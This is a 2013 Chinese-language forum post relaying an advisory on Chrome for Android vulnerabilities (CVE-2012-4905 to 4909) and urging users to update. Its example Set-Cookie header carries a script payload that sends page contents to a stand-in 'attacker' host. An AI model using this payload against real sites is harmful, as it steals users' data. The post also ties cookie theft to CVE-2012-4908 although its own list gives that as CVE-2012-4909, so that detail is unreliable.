微剋多資訊

 找回密碼
 註冊

Login

Login

搜索

該用戶從未簽到

發表於 2013-1-9 20:38 | 顯示全部樓層 |閱讀模式
主題:Android 上的 Chrome 瀏覽器爆發多種漏洞可竊取資料

發佈日期:2013/01/07 (但於 2012/7~8月發現)

影響版本:Chrome for Android v18.0.1025123 含以前的所有版本

漏洞編號:
CVE-2012-4905 ~ Chrome for Android - UXSS via com.android.browser.application_id Intent extra
CVE-2012-4906 ~ Chrome for Android - Download Function Information Disclosure
CVE-2012-4907 ~ Chrome for Android - Android APIs exposed to JavaScript
CVE-2012-4908 ~ Chrome for Android - Bypassing SOP for Local Files By Symlinks
CVE-2012-4909 ~ Chrome for Android - Cookie theft from Chrome by malicious Android app

說明:
從去年(2012年)以來就陸續被發現於 Android 上的 Chrome 瀏覽器有許多設計上的問題,在官方網站上也提列為"中度風險"的安全漏洞,官方網站建議使用 Android 的使用者盡速更新,以免造成隱私外洩!

以 CVE-2012-4908 漏洞來看,使用者只要點選惡意的超連結便可讓有毒的 Android APP 竊取 Chrome 瀏覽器 Cookie 內的資料,進而讓攻擊者採用手持式裝置版本的釣魚網站來進行社交攻擊取得帳號密碼等關鍵資料!

範例:
Set-Cookie: x=<img><script>document.images[0].src='http://attacker/?'+encodeURIComponent(document.body.innerHTML)</script>;expires=Tue, 01-Jan-2030 00:00:00 GMT

官方網站說明:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html

依照官方說明建議:
將Android 上的 Chrome 瀏覽器更新至 Chrome for Android v18.0.1025308 以後的版本修正。

概念驗證程式下載處(PoC):http://www.securityfocus.com/archive/1


From
https://www.facebook.com/netwargame
您需要登入後才可以回帖 登入 | 註冊

本版積分規則

小黑屋|Archiver|微剋多資訊(MicroDuo)

GMT+8, 2016-12-9 19:34

Discuz! X

© 2009-2016 Microduo

快速回覆 返回頂部 返回列表